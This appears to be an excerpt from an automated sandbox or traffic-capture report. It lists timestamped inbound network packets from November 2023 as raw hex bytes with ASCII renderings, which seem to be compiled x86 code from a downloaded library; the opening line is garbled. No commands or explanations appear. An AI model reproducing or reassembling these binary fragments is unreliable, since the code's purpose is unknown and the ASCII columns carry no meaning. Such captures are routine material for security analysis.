L$$\$;L$5L$3=ct3wq
2023-11-18 09:02:40 UTC	2283	IN	Data Raw: 1c 08 be 01 00 00 00 88 1c 0a 8b 5d f4 03 c6 42 89 55 f8 80 3c 08 00 75 ce c6 04 0a 00 5e 5b 8b e5 5d c3 cc cc 55 8b ec 8b 4d 0c 33 c0 56 8b 75 08 0f 1f 40 00 0f ac ce 07 40 c1 e9 07 8b d6 0b d1 75 f2 5e 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 0f b6 01 56 8d 71 01 83 e0 7f 0f b6 0e c1 e1 07 0b c8 f7 c1 00 40 00 00 75 09 89 0a b8 02 00 00 00 5e c3 0f b6 46 01 81 e1 ff 3f 00 00 c1 e0 0e 0b c1 a9 00 00 20 00 75 09 89 02 b8 03 00 00 00 5e c3 0f b6 4e 02 25 ff ff 1f 00 c1 e1 15 0b c8 f7 c1 00 00 00 10 75 09 89 0a b8 04 00 00 00 5e c3 0f b6 46 03 81 e1 ff ff ff 0f 83 e0 07 c1 e0 1c 0b c1 89 02 b8 05 00 00 00 5e c3 cc cc cc cc 55 8b ec 83 ec 28 0f 57 c0 89 4d e8 66 0f 13 45 f4 8b c2 8b 55 f8 53 56 89 55 f0 33 f6 8b 55 f4 57 89 45 ec 8b f9 89 55 f8 0f Data Ascii: ]BU<u^[]UM3Vu@@u^]Vq@u^F? u^N%u^F^U(WMfEUSVU3UWEU
2023-11-18 09:02:40 UTC	2299	IN	Data Raw: b9 68 01 00 00 eb 70 3b b9 70 01 00 00 72 10 8b 81 60 01 00 00 89 07 89 b9 60 01 00 00 eb 58 83 3d c8 22 14 10 00 74 45 a1 e8 41 14 10 85 c0 74 0a 50 ff 15 18 23 14 10 83 c4 04 57 ff 15 f4 22 14 10 29 05 40 42 14 10 83 c4 04 ff 0d 64 42 14 10 57 ff 15 ec 22 14 10 a1 e8 41 14 10 83 c4 04 85 c0 74 13 50 ff 15 20 23 14 10 eb 07 57 ff 15 ec 22 14 10 83 c4 04 8b ce e8 87 4c 03 00 8b 46 10 c6 46 5d d5 8b 78 1c 85 ff 0f 84 a7 00 00 00 83 be 20 02 00 00 00 74 0e 8b d7 8b ce e8 73 9a 09 00 e9 90 00 00 00 3b be 74 01 00 00 73 30 3b be 6c 01 00 00 72 10 8b 86 68 01 00 00 89 07 89 be 68 01 00 00 eb 70 3b be 70 01 00 00 72 10 8b 86 60 01 00 00 89 07 89 be 60 01 00 00 eb 58 83 3d c8 22 14 10 00 74 45 a1 e8 41 14 10 85 c0 74 0a 50 ff 15 18 23 14 10 83 c4 04 57 ff 15 f4 Data Ascii: hp;pr``X="tEAtP#W")@BdBW"AtP #W"LFF]x ts;ts0;lrhhp;pr``X="tEAtP#W
2023-11-18 09:02:40 UTC	2301	IN	Data Raw: 8b 45 10 8b 5e 20 8b 7e 24 85 c0 7e 0f 8b 04 d5 b4 c4 13 10 33 c9 0b c3 0b cf eb 13 75 17 8b 04 d5 b4 c4 13 10 33 c9 f7 d0 f7 d1 23 c3 23 cf 89 4e 24 89 46 20 3b 5e 20 75 05 3b 7e 24 74 27 8b 4e 04 85 c9 74 20 0f 1f 80 00 00 00 00 8b 81 a0 00 00 00 83 e0 fd 83 c8 01 89 81 a0 00 00 00 8b 49 08 85 c9 75 e7 8b 7d 14 85 ff 74 54 8b 0c d5 b4 c4 13 10 33 c0 23 4e 20 23 46 24 0b c8 74 10 b8 01 00 00 00 89 07 33 c0 5f 5e 5b 8b e5 5d c3 33 c0 89 07 5f 5e 5b 8b e5 5d c3 ff 75 18 8b 55 10 ff 75 14 8b 4d 08 e8 11 02 00 00 83 c4 08 5f 5e 5b 8b e5 5d c3 8b 45 08 8b 48 10 8b 45 10 89 01 5f 5e 33 c0 5b 8b e5 5d c3 cc cc cc 55 8b ec 83 ec 08 56 57 8b 7d 08 33 c0 8b cf 89 45 f8 33 f6 e8 07 43 09 00 85 c0 75 27 68 74 09 13 10 68 bf 8e 02 00 68 4c e3 12 10 68 1c e3 12 10 6a Data Ascii: E^ ~$~3u3##N$F ;^ u;~$t'Nt Iu}tT3#N #F$t3_^[]3_^[]uUuM_^[]EHE_^3[]UVW}3E3Cu'hthhLhj
2023-11-18 09:02:40 UTC	2315	IN	Data Raw: 43 d4 89 48 14 8b ce 8b 53 d4 e8 1e 8b 05 00 e9 df 06 00 00 8b 53 ec 85 d2 74 07 8b 0e e8 fb 6d 05 00 8b 53 f8 85 d2 0f 84 c6 06 00 00 8b 0e e8 f9 81 05 00 e9 ba 06 00 00 ff 73 ec 8b 53 d4 8b 4d 0c e8 26 72 05 00 8b 4d 0c 83 c4 04 8b d0 89 43 d4 ff 73 04 e8 13 72 05 00 83 c4 04 e9 8e 06 00 00 8b 75 0c 8b 53 ec 8b 0e e8 ee 72 05 00 ff 73 04 8b d0 89 43 e0 8b ce e8 ef 71 05 00 83 c4 04 89 43 e0 e9 6a 06 00 00 ff 73 04 8b 53 ec 8b 4d 0c e8 d6 71 05 00 83 c4 04 89 43 ec e9 51 06 00 00 8b 4d 0c 8b 53 04 8b 09 e8 ae 72 05 00 89 43 04 e9 3c 06 00 00 8b 75 0c 6a 00 6a 50 8b 06 8b c8 89 44 24 24 e8 72 53 09 00 8b f8 83 c4 08 85 ff 74 45 6a 48 8d 47 08 c7 47 04 01 00 00 00 6a 00 50 c7 07 01 00 00 00 e8 cf 65 f8 ff 8b 4c 24 28 8d 53 d4 c7 47 34 ff ff ff ff 83 c4 0c Data Ascii: CHSStmSsSM&rMCsruSrsCqCjsSMqCQMSrC<ujjPD$$rStEjHGGjPeL$(SG4
2023-11-18 09:02:40 UTC	2321	IN	Data Raw: e8 38 ec 06 00 8b f0 8b 44 24 10 8b 48 20 6a 38 6a 00 8b 41 34 8b 49 18 89 44 24 18 0f bf 41 22 ff 4b 38 89 44 24 34 33 c0 89 44 24 24 89 84 24 94 00 00 00 89 44 24 48 89 44 24 20 89 44 24 38 89 44 24 14 89 44 24 1c 8b 43 38 89 44 24 50 8d 44 24 5c 50 e8 c4 4f f8 ff 8b 45 0c 83 c4 0c 89 44 24 64 8b 45 10 89 44 24 60 8b 47 30 89 44 24 38 89 44 24 7c 89 5c 24 54 8d 48 01 89 7c 24 58 89 4c 24 4c 8d 48 02 83 c0 03 89 74 24 5c 89 84 24 84 00 00 00 8a 47 11 89 4c 24 74 3c 56 74 47 3c 5a 74 0a c7 44 24 6c 02 00 00 00 eb 5b 8b cf e8 28 24 00 00 85 c0 75 50 80 7f 12 58 75 1e 80 7f 10 59 74 44 8b 57 1c 8b cb e8 2e 13 00 00 85 c0 74 36 c7 44 24 6c 03 00 00 00 eb 2c c7 44 24 6c 01 00 00 00 eb 22 80 7f 10 59 74 1c 8b 57 18 8b cb e8 06 13 00 00 8b 4c 24 6c 85 c0 b8 01 Data Ascii: 8D$H j8jA4ID$A"K8D$43D$$$D$HD$ D$8D$D$C8D$PD$\POED$dED$`G0D$8D$\|\$TH\|$XL$LHt$\$GL$t<VtG<ZtD$l[($uPXuYtDW.t6D$l,D$l"YtWL$l
2023-11-18 09:02:40 UTC	2335	IN	Data Raw: 01 8b cf e8 a5 b3 06 00 8b f0 8b 44 24 28 89 74 24 20 89 44 24 10 8b d8 85 c0 0f 84 e3 07 00 00 80 7b 60 00 8b 53 2c 89 54 24 24 74 0b 33 c9 89 4c 24 18 e9 e6 00 00 00 8b 43 48 8b 40 14 85 c0 74 04 8b 08 eb 02 33 c9 33 ff 89 4c 24 18 85 c9 0f 8e c4 00 00 00 0f 1f 80 00 00 00 00 83 ff 01 75 49 81 7a 20 6c 51 13 10 75 40 8b 44 24 10 8b 5d 10 8b 4e 74 43 8b 50 50 8b 44 24 28 42 8b 40 30 89 44 24 2c 39 4e 78 7f 12 53 52 50 8d 57 5b 8b ce e8 26 b0 06 00 83 c4 0c eb 69 8d 41 01 89 46 74 8b 46 70 8b 74 24 2c eb 38 8b 44 24 10 8b 5d 10 8b 4e 74 03 df 8b 50 50 03 d7 39 4e 78 7f 16 53 52 ff 75 08 ba 5c 00 00 00 8b ce e8 eb af 06 00 83 c4 0c eb 2e 8d 41 01 89 46 74 8b 46 70 8b 75 08 8d 0c 89 89 74 88 04 8b 74 24 20 c7 44 88 10 00 00 00 00 89 5c 88 0c 89 54 88 08 c7 Data Ascii: D$(t$ D${`S,T$$t3L$CH@t33L$uIz lQu@D$]NtCPPD$(B@0D$,9NxSRPW[&iAFtFpt$,8D$]NtPP9NxSRu\.AFtFputt$ D\T
2023-11-18 09:02:40 UTC	2345	IN	Data Raw: 74 09 8b 0e 5e 5d e9 8a a1 06 00 5e 5d c3 cc cc cc cc cc cc cc 55 8b ec 8b 4d 08 b8 00 20 00 00 56 8b 71 08 66 85 46 08 75 0e ba 08 00 00 00 e8 81 1e 06 00 8b f0 eb 03 8b 76 10 85 f6 74 36 83 46 04 ff 75 30 57 8b 3e 85 ff 74 22 b8 00 24 00 00 66 85 47 08 75 06 83 7f 18 00 74 07 8b cf e8 b1 a9 06 00 8b 4f 20 8b d7 e8 77 e1 08 00 c7 06 00 00 00 00 5f 5e 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 53 8b 5d 08 b8 00 20 00 00 56 8b 73 08 66 85 46 08 75 10 ba 08 00 00 00 8b cb e8 0e 1e 06 00 8b f0 eb 03 8b 76 10 85 f6 74 4d 57 8b 3e 85 ff 74 22 b8 00 24 00 00 66 85 47 08 75 06 83 7f 18 00 74 07 8b cf e8 44 a9 06 00 8b 4f 20 8b d7 e8 0a e1 08 00 8b 45 10 ff 30 e8 10 2b 06 00 83 c4 04 89 06 5f 85 c0 75 0d 53 e8 00 23 06 00 83 c4 04 5e 5b 5d c3 ff 46 04 Data Ascii: t^]^]UM VqfFuvt6Fu0W>t"$fGutO w_^]US] VsfFuvtMW>t"$fGutDO E0+_uS#^[]F
2023-11-18 09:02:40 UTC	2353	IN	Data Raw: 00 00 c7 43 08 01 00 00 00 c7 43 0c 00 00 00 00 89 87 f4 02 00 00 8b 47 08 66 89 4f 34 85 c0 74 05 8a 00 88 47 2d b8 00 01 00 00 66 85 47 28 74 04 c6 47 2f 01 80 7d aa 01 76 07 81 4b 24 00 00 20 00 8b c1 5f 5e 5b 8b 4d fc 33 cd e8 e0 b7 f7 ff 8b e5 5d c3 8b 5d 94 c7 43 24 01 12 00 00 f6 46 38 20 75 13 8b 55 84 8b 4e 58 8b 46 5c 23 4a 38 23 42 3c 0b c8 75 07 c7 43 24 41 12 00 00 b8 27 00 00 00 66 89 7b 28 66 89 7b 18 89 73 20 66 89 43 14 e9 4b ff ff ff 8b 4d fc 33 c0 5f 5e 33 cd 5b e8 8a b7 f7 ff 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc 55 8b ec 81 ec 84 00 00 00 53 56 57 8b f9 89 55 ac 89 7d e4 c7 45 b8 00 00 00 00 c7 45 b0 00 00 00 00 8b 07 89 45 98 c7 45 b4 00 00 00 00 c7 45 a8 00 00 00 00 8b 30 0f b6 47 2c 89 75 94 89 45 f8 83 f8 01 7f 07 bb 01 00 00 Data Ascii: CCGfO4tG-fG(tG/}vK$ _^[M3]]C$F8 uUNXF\#J8#B<uC$A'f{(f{s fCKM3_^3[]USVWU}EEEEE0G,uE
2023-11-18 09:02:40 UTC	2369	IN	Data Raw: bc f8 ff 8b 47 24 83 c4 0c a9 00 04 00 00 74 0b c6 47 1c 00 33 c0 5f 5e 5b 5d c3 a9 00 40 00 00 74 07 c7 47 20 00 00 00 00 5f 5e 33 c0 5b 5d c3 cc cc cc cc cc 55 8b ec 83 ec 08 53 56 8b f2 89 4d fc 57 8b 7d 08 0f b7 46 2c 3b c7 7d 55 83 c7 07 83 e7 f8 6a 00 8d 04 bd 00 00 00 00 50 e8 22 7b 08 00 8b d8 83 c4 08 85 db 75 0a 8d 43 07 5f 5e 5b 8b e5 5d c3 0f b7 46 2c c1 e0 02 50 ff 76 30 53 e8 7e bb f8 ff 8b 56 30 8d 46 38 83 c4 0c 3b d0 74 08 8b 4d fc e8 59 7f 08 00 89 5e 30 66 89 7e 2c 5f 5e 33 c0 5b 8b e5 5d c3 cc cc cc cc cc cc cc cc cc 53 56 8b f2 57 8b f9 8b 56 30 8d 5e 38 3b d3 74 05 e8 2a 7f 08 00 8b d6 8b cf e8 21 00 00 00 33 c0 89 5e 30 66 89 46 28 b8 03 00 00 00 5f 66 89 46 2c c7 46 24 00 00 00 00 5e 5b c3 cc cc cc cc 56 8b f2 57 8b f9 8b 46 24 a9 Data Ascii: G$tG3_^[]@tG _^3[]USVMW}F,;}UjP"{uC_^[]F,Pv0S~V0F8;tMY^0f~,_^3[]SVWV0^8;t*!3^0fF(_fF,F$^[VWF$
2023-11-18 09:02:40 UTC	2383	IN	Data Raw: b6 17 50 56 8b 74 24 28 8b ce e8 1e 79 04 00 83 c4 18 85 c0 74 0f 8b 4f 04 83 e1 01 09 48 04 8b 4f 24 89 48 24 6a 01 8b d0 8b cb e8 8d 16 00 00 8b 4c 24 24 83 c4 04 8b d3 50 e8 ae f5 ff ff 8b 44 24 64 83 c4 04 8b 54 24 54 40 89 44 24 60 3b c2 7c 8a 8b 43 14 8b 54 24 18 66 83 4c 10 0a 06 33 c9 66 89 4c 10 0c e9 cc 02 00 00 8a 27 80 fc 31 0f 85 ac 00 00 00 83 79 1c 00 0f 85 a2 00 00 00 8b 4f 0c 80 39 b0 0f 85 96 00 00 00 f7 47 04 00 08 00 00 0f 84 89 00 00 00 8b 47 14 83 78 34 00 0f 85 7c 00 00 00 83 78 44 00 75 76 80 7b 08 2c 0f 85 7d 02 00 00 33 d2 89 54 24 60 e8 bb 83 04 00 85 c0 0f 8e 6a 02 00 00 0f 1f 00 6a 02 8b d7 8b cb e8 e5 15 00 00 8b 4b 14 8b f0 8b 44 24 64 83 c4 04 40 89 44 24 60 8d 14 76 03 d2 56 89 44 d1 1c 8b d3 8b 4c 24 24 e8 ef f4 ff ff 83 Data Ascii: PVt$(ytOHO$H$jL$$PD$dT$T@D$`;\|CT$fL3fL'1yO9GGx4\|xDuv{,}3T$`jjKD$d@D$`vVDL$$
2023-11-18 09:02:40 UTC	2399	IN	Data Raw: 10 09 10 8b 57 10 89 5d c8 85 d2 74 08 8d 4d d8 e8 c8 77 04 00 8b 7f 08 85 ff 74 23 8b 37 83 c7 08 85 f6 7e 1a 8b 17 85 d2 74 0c 8d 4d d8 e8 aa 77 04 00 85 c0 75 08 4e 83 c7 14 85 f6 7f e6 8b 7d 0c 8b 7f 0c 85 ff 74 23 8b 37 83 c7 08 85 f6 7e 1a 8b 17 85 d2 74 0c 8d 4d d8 e8 7d 77 04 00 85 c0 75 08 4e 83 c7 14 85 f6 7f e6 8b 75 fc 8b 7d 0c 8b 4d f8 43 83 c6 14 89 75 fc 0f b7 41 34 3b d8 8b c1 b9 01 00 00 00 0f 8c ae fe ff ff 5f 5b 5e 8b e5 5d c3 cc cc cc cc cc cc cc 55 8b ec 56 8b 75 0c 80 3e a6 75 5b 8b 45 08 57 8b 78 18 8b 46 1c 3b 47 04 75 46 0f bf 46 20 3b 47 10 75 3d 8b d6 8b cf e8 b3 00 00 00 0f bf 4e 20 85 c9 78 0f 8b 46 2c 03 c9 8b 40 04 0f be 44 c8 08 eb 05 b8 44 00 00 00 88 46 01 8b 47 08 89 46 1c 66 8b 47 0c 66 89 46 20 c7 46 2c 00 00 00 00 5f Data Ascii: W]tMwt#7~tMwuN}t#7~tM}wuNu}MCuA4;_[^]UVu>u[EWxF;GuFF ;Gu=N xF,@DDFGFfGfF F,_
2023-11-18 09:02:40 UTC	2404	IN	Data Raw: 12 10 50 e8 9d c8 07 00 83 c4 10 8b 8d 78 ff ff ff 85 c9 74 28 8b 45 84 c6 04 08 00 83 7d 80 00 76 15 f6 45 89 04 75 0f 8d 8d 74 ff ff ff e8 42 cf 07 00 8b c8 eb 06 8b 8d 78 ff ff ff 8b 85 68 ff ff ff ba b4 00 00 00 6a f9 51 6a 00 ff b0 d4 00 00 00 8b 85 64 ff ff ff 8b c8 ff 70 74 e8 42 96 05 00 83 c4 14 8b f8 8b c7 5f 5e 5b 8b 4d fc 33 cd e8 1a ec f6 ff 8b e5 5d c3 8b 4d fc 33 c0 5f 5e 33 cd 5b e8 07 ec f6 ff 8b e5 5d c3 cc cc cc cc cc cc cc 55 8b ec 83 ec 14 53 8b da 56 8b f1 89 5d f0 57 8b 43 20 0f b7 4b 2a 89 45 fc 0f b7 43 18 89 45 f8 89 4d f4 66 85 c0 75 0a f6 43 24 30 0f 84 59 01 00 00 8b 56 10 83 c2 02 3b 56 08 72 13 6a 02 ba 1c d8 12 10 8b ce e8 f4 cf 07 00 83 c4 04 eb 11 8b 4e 04 89 56 10 66 a1 1c d8 12 10 66 89 44 11 fe 8b 45 f8 33 ff 0f b7 c0 Data Ascii: Pxt(E}vEutBxhjQjdptB_^[M3]M3_^3[]USV]WC K*ECEMfuC$0YV;VrjNVffDE3
2023-11-18 09:02:40 UTC	2416	IN	Data Raw: 00 83 c4 0c eb 32 8b 5d 08 8d 41 01 89 46 74 8d 0c 89 8b 46 70 c7 04 88 55 00 00 00 89 54 88 04 c7 44 88 08 00 00 00 00 c7 44 88 0c 00 00 00 00 c7 44 88 10 00 00 00 00 8b 4c 24 18 0f bf 43 22 47 83 c1 10 89 4c 24 18 3b f8 7c 89 8b 5c 24 0c 8b 53 0c 85 d2 74 12 8b 4c 24 1c 6a 00 6a 00 e8 61 eb 03 00 83 c4 08 eb 02 33 c0 8b 53 08 53 6a 00 6a 00 6a 02 50 51 8b 4c 24 34 6a 00 e8 f3 e6 03 00 8b 54 24 50 83 c4 08 8b 4c 24 34 50 e8 12 11 00 00 83 c4 18 5f 5e 5b 8b e5 5d c3 cc cc cc cc cc cc cc cc 85 c9 74 11 83 39 00 74 0c 39 51 1c 74 07 8b 49 10 85 c9 75 ef 8b c1 c3 cc cc cc cc cc cc cc cc 85 c9 75 03 33 c0 c3 8b 49 10 85 c9 75 06 b8 01 00 00 00 c3 83 39 00 74 f5 33 c0 39 41 1c 0f 94 c0 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 81 ec d0 00 00 00 a1 Data Ascii: 2]AFtFpUTDDDL$C"GL$;\|\$StL$jja3SSjjjPQL$4jT$PL$4P_^[]t9t9QtIuu3Iu9t39AU
2023-11-18 09:02:40 UTC	2432	IN	Data Raw: 74 24 44 e8 5d e1 00 00 8b f0 83 c4 1c 85 f6 74 07 81 4e 04 00 00 00 08 8b 44 24 18 88 44 24 3c 8b 44 24 38 89 44 24 40 8b 45 08 c7 44 24 50 00 00 00 00 c7 44 24 48 00 00 00 00 c7 44 24 4c 00 00 00 00 85 c0 74 0a 0f b7 40 32 89 44 24 44 eb 08 c7 44 24 44 ff ff ff ff 8d 44 24 3c 8b d6 50 8b cf e8 7e 2b 00 00 83 c4 04 85 f6 74 10 8b 4c 24 14 8b d6 6a 01 e8 ba e2 00 00 83 c4 04 5f 5e 5b 8b e5 5d c3 55 8b ec 83 e4 f8 51 53 56 57 8b f9 8b da 6a 00 6a 34 8b 0f e8 07 82 07 00 8b f0 83 c4 08 85 f6 74 43 6a 34 6a 00 56 e8 74 94 f6 ff 83 c4 0c c6 06 4b 83 c8 ff 8b ce 66 89 46 22 e8 10 b9 03 00 8b 07 8b 80 84 00 00 00 39 46 18 7e 0f 50 68 30 9d 12 10 57 e8 77 4c 07 00 83 c4 0c 8d 43 01 66 89 46 20 8b c6 5f 5e 5b 8b e5 5d c3 cc cc cc cc 55 8b ec 8b c2 83 ec 1c 8b 51 Data Ascii: t$D]tND$D$<D$8D$@ED$PD$HD$Lt@2D$DD$DD$<P~+tL$j_^[]UQSVWjj4tCj4jVtKfF"9F~Ph0WwLCfF _^[]UQ
2023-11-18 09:02:40 UTC	2448	IN	Data Raw: 03 c1 89 54 24 3c 89 46 2c 8b 54 24 40 8b ce 6a 00 6a 00 ff 74 24 44 e8 79 0e 03 00 8b 44 24 28 33 c9 83 c4 0c 89 8c 24 84 00 00 00 39 48 20 7e 5d 8b 74 24 1c 33 c0 89 44 24 58 8b 56 1c 03 d0 0f bf 42 12 3b 44 24 6c 7c 28 8b 44 24 3c 8b cf 03 44 24 6c 50 0f bf 42 10 50 ff 72 08 8b 12 e8 f1 27 03 00 8b 8c 24 90 00 00 00 83 c4 0c ff 44 24 6c 8b 44 24 58 41 83 c0 14 89 8c 24 84 00 00 00 89 44 24 58 3b 4e 20 7c b1 8b 74 24 0c 8a 46 13 84 c0 75 08 ff 46 2c 8b 56 2c eb 0f fe c8 88 46 13 0f b6 c0 8b 94 86 94 00 00 00 8b 4f 74 89 54 24 6c 39 4f 78 7f 1e 52 ff 74 24 54 ba 5f 00 00 00 8b cf ff 74 24 44 e8 88 ed 04 00 8b 54 24 78 83 c4 0c eb 33 8b 74 24 3c 8d 41 01 89 47 74 8d 0c 89 8b 47 70 89 74 88 04 8b 74 24 50 89 74 88 08 8b 74 24 0c c7 04 88 5f 00 00 00 89 54 Data Ascii: T$<F,T$@jjt$DyD$(3$9H ~]t$3D$XVB;D$l\|(D$<D$lPBPr'$D$lD$XA$D$X;N \|t$FuF,V,FOtT$l9OxRt$T_t$DT$x3t$<AGtGptt$Ptt$_T
2023-11-18 09:02:40 UTC	2480	IN	Data Raw: ff 75 08 8b fa 8b d6 ff 77 20 e8 c6 00 00 00 0f 57 c0 c7 45 fc 00 00 00 00 83 c4 08 66 0f d6 45 f4 0f 11 45 e4 8b d7 89 75 fc 8d 4d e4 c7 45 e8 c0 12 0a 10 c7 45 ec a0 85 0d 10 e8 35 73 03 00 5f 5e 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 8b 45 0c 8b 55 08 0f b6 08 81 f9 a6 00 00 00 74 08 81 f9 b2 00 00 00 75 17 8b 4a 18 56 8b 70 1c 3b 31 7d 0b 8b 4c b1 04 85 c9 7e 03 89 48 1c 5e f6 40 04 01 74 15 8b 4a 18 8b 50 24 3b 11 7d 0b 8b 4c 91 04 85 c9 7e 03 89 48 24 33 c0 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 8b 41 18 8b 0a 3b 08 7d 0a 8b 44 88 04 85 c0 7e 02 89 02 c3 cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 83 ec 0c 53 57 8b 7d 08 8b da 8b d1 33 c9 89 55 f8 89 4d fc 39 0f 7e 78 8b 45 08 83 c7 34 89 7d f4 56 3b 4d 0c 74 5a Data Ascii: uw WEfEEuMEE5s_^]UEUtuJVp;1}L~H^@tJP$;}L~H$3]A;}D~USW}3UM9~xE4}V;MtZ
2023-11-18 09:02:40 UTC	2512	IN	Data Raw: 01 89 46 74 8d 0c 89 8b 46 70 89 54 88 04 8b 54 24 40 c7 04 88 5c 00 00 00 89 54 88 08 89 5c 88 0c c7 44 88 10 00 00 00 00 8b 4e 74 39 4e 78 7f 1f 6a 00 ff 74 24 24 ba 7d 00 00 00 8b ce ff 74 24 30 e8 0e 6e 04 00 8b 54 24 2c 83 c4 0c eb 33 8b 54 24 28 8d 41 01 89 46 74 8d 0c 89 8b 46 70 89 54 88 04 8b 54 24 20 c7 04 88 7d 00 00 00 89 54 88 08 c7 44 88 0c 00 00 00 00 c7 44 88 10 00 00 00 00 8b 4e 74 39 4e 78 7f 17 52 53 ff 74 24 30 ba 7e 00 00 00 8b ce e8 b8 6d 04 00 83 c4 0c eb 2f 8b 7c 24 28 8d 41 01 89 46 74 8d 0c 89 8b 46 70 89 7c 88 04 8b 7c 24 24 c7 04 88 7e 00 00 00 89 5c 88 08 89 54 88 0c c7 44 88 10 00 00 00 00 8b 46 74 85 c0 0f 8e 78 02 00 00 8d 0c 80 ba 08 00 00 00 8b 46 70 66 89 54 88 ee e9 63 02 00 00 8b 55 10 8b 5c 24 14 8b 42 14 8b 56 74 89 Data Ascii: FtFpTT$@\T\DNt9Nxjt$$}t$0nT$,3T$(AFtFpTT$ }TDDNt9NxRSt$0~m/\|$(AFtFp\|\|$$~\TDFtxFpfTcU\$BVt
2023-11-18 09:02:40 UTC	2560	IN	Data Raw: 00 00 00 00 74 51 8b 4c 24 24 83 c1 0b 3b 4c 24 1c 72 15 6a 0b ba 0c ca 12 10 8d 4c 24 18 e8 72 63 06 00 83 c4 04 eb 27 f3 0f 7e 05 0c ca 12 10 89 4c 24 24 03 4c 24 18 66 0f d6 41 f5 66 a1 14 ca 12 10 66 89 41 fd a0 16 ca 12 10 88 41 ff c7 44 24 10 01 00 00 00 f6 47 05 c0 74 4d 8b 4c 24 24 83 c1 0e 3b 4c 24 1c 72 15 6a 0e ba 18 ca 12 10 8d 4c 24 18 e8 1b 63 06 00 83 c4 04 eb 27 f3 0f 7e 05 18 ca 12 10 89 4c 24 24 03 4c 24 18 66 0f d6 41 f2 a1 20 ca 12 10 89 41 fa 66 a1 24 ca 12 10 66 89 41 fe ff 44 24 10 8b 54 24 24 42 3b 54 24 1c 72 15 6a 01 ba f8 92 12 10 8d 4c 24 18 e8 d0 62 06 00 83 c4 04 eb 12 8b 44 24 18 8a 0d f8 92 12 10 89 54 24 24 88 4c 02 ff 8b 4c 24 18 85 c9 74 1f 8b 44 24 24 c6 04 08 00 83 7c 24 20 00 76 10 f6 44 24 29 04 75 09 8d 4c 24 14 e8 Data Ascii: tQL$$;L$rjL$rc'~L$$L$fAffAAD$GtML$$;L$rjL$c'~L$$L$fA Af$fAD$T$$B;T$rjL$bD$T$$LL$tD$$\|$ vD$)uL$
2023-11-18 09:02:40 UTC	2592	IN	Data Raw: 00 8b 4d 08 90 80 3b 00 0f 84 d0 03 00 00 8b 54 24 14 8d 44 24 24 50 8d 44 24 24 33 db 50 53 68 80 00 00 00 6a ff 89 5c 24 2c 89 5c 24 34 e8 92 a7 ff ff 8b 7c 24 34 8b f0 83 c4 14 89 74 24 10 85 f6 0f 85 f9 01 00 00 85 ff 75 0a 8b 5c 24 24 89 5c 24 14 eb ab 33 f6 89 5c 24 1c 89 74 24 14 0f 1f 44 00 00 57 e8 da 84 03 00 83 c4 04 89 44 24 10 83 7d 10 00 0f 84 03 01 00 00 83 f8 64 74 2a 83 f8 65 0f 85 f5 00 00 00 83 7c 24 1c 00 0f 85 f3 00 00 00 8b 45 08 8b 40 20 25 00 01 00 00 83 c8 00 0f 84 df 00 00 00 eb 07 83 7c 24 1c 00 75 62 0f b7 9f 98 00 00 00 8b 4d 08 6a 00 8d 04 dd 04 00 00 00 50 e8 da 41 06 00 8b f0 83 c4 08 89 74 24 14 85 f6 0f 84 67 01 00 00 33 f6 85 db 74 1f 0f 1f 00 6a 00 6a 00 8b d6 8b cf e8 a3 77 03 00 8b 4c 24 1c 83 c4 08 89 04 b1 46 3b f3 Data Ascii: M;T$D$$PD$$3PShj\$,\$4\|$4t$u\$$\$3\$t$DWD$}dt*e\|$E@ %\|$ubMjPAt$g3tjjwL$F;
2023-11-18 09:02:40 UTC	2624	IN	Data Raw: 00 89 44 24 2c e8 ab ac 03 00 8b 84 24 9c 00 00 00 ba 0e 00 00 00 8b 4c 24 18 50 89 44 24 68 e8 01 ad 03 00 8b 4c 24 1c 83 c4 0c ba 5f 00 00 00 8b f0 57 ff 74 24 24 ff 74 24 50 e8 a5 ad 03 00 8b 4c 24 1c 83 c4 0c ba 7d 00 00 00 ff 74 24 24 ff 74 24 44 e8 5c ac 03 00 ff 74 24 2c 8b 4c 24 1c ba 7e 00 00 00 57 ff 74 24 50 e8 75 ad 03 00 8b 4c 24 24 83 c4 14 8b d6 e8 c7 ab 03 00 8b 4c 24 10 8b d6 e8 7c a0 03 00 8b d7 8b 7c 24 2c 8b cf e8 9f b4 01 00 8b 54 24 24 e8 96 b4 01 00 8b 54 24 20 eb 52 8b 4c 24 64 0f 57 c0 0f 29 84 24 90 00 00 00 0f 29 84 24 a0 00 00 00 89 bc 24 90 00 00 00 c7 44 24 40 ff ff ff ff 85 c9 74 22 8b 01 8b d1 8d 8c 24 90 00 00 00 89 44 24 20 e8 b2 49 02 00 85 c0 0f 85 16 0a 00 00 8b 54 24 20 eb 06 33 d2 89 54 24 20 8b 75 0c 85 f6 0f 85 cd Data Ascii: D$,$L$PD$hL$_Wt$$t$PL$}t$$t$D\t$,L$~Wt$PuL$$L$\|\|$,T$$T$ RL$dW)$)$$D$@t"$D$ IT$ 3T$ u
2023-11-18 09:02:40 UTC	2656	IN	Data Raw: 00 00 99 8b 09 66 85 71 08 74 0f 52 50 e8 23 89 03 00 83 c4 08 5e 8b e5 5d c3 89 01 b8 04 00 00 00 89 51 04 66 89 41 08 5e 8b e5 5d c3 cc cc cc cc cc cc cc cc 55 8b ec 83 e4 f8 8b 45 08 83 ec 0c 56 8b 30 b8 00 24 00 00 66 85 46 08 74 09 8b ce e8 2f 8f 03 00 eb 09 b8 01 00 00 00 66 89 46 08 f2 0f 10 05 20 cd 13 10 f2 0f 11 44 24 08 8b 4c 24 0c 8b c1 25 00 00 f0 7f 33 d2 75 15 3d 00 00 f0 7f 75 0e 8b 44 24 08 81 e1 ff ff 0f 00 0b c1 75 0d b8 08 00 00 00 f2 0f 11 06 66 89 46 08 5e 8b e5 5d c3 55 8b ec 83 e4 c0 83 ec 3c 56 8b 75 10 ff 36 e8 bc dd 02 00 83 c4 04 83 f8 01 74 09 83 f8 02 0f 85 c8 00 00 00 ff 76 04 e8 a3 dd 02 00 83 c4 04 83 f8 01 74 09 83 f8 02 0f 85 af 00 00 00 8b 0e 0f b7 41 08 a8 08 74 06 f2 0f 10 01 eb 2a a8 24 74 12 8b 51 04 8b 09 e8 44 ff Data Ascii: fqtRP#^]QfA^]UEV0$fFt/fF D$L$%3u=uD$ufF^]U<Vu6tvtAt*$tQD
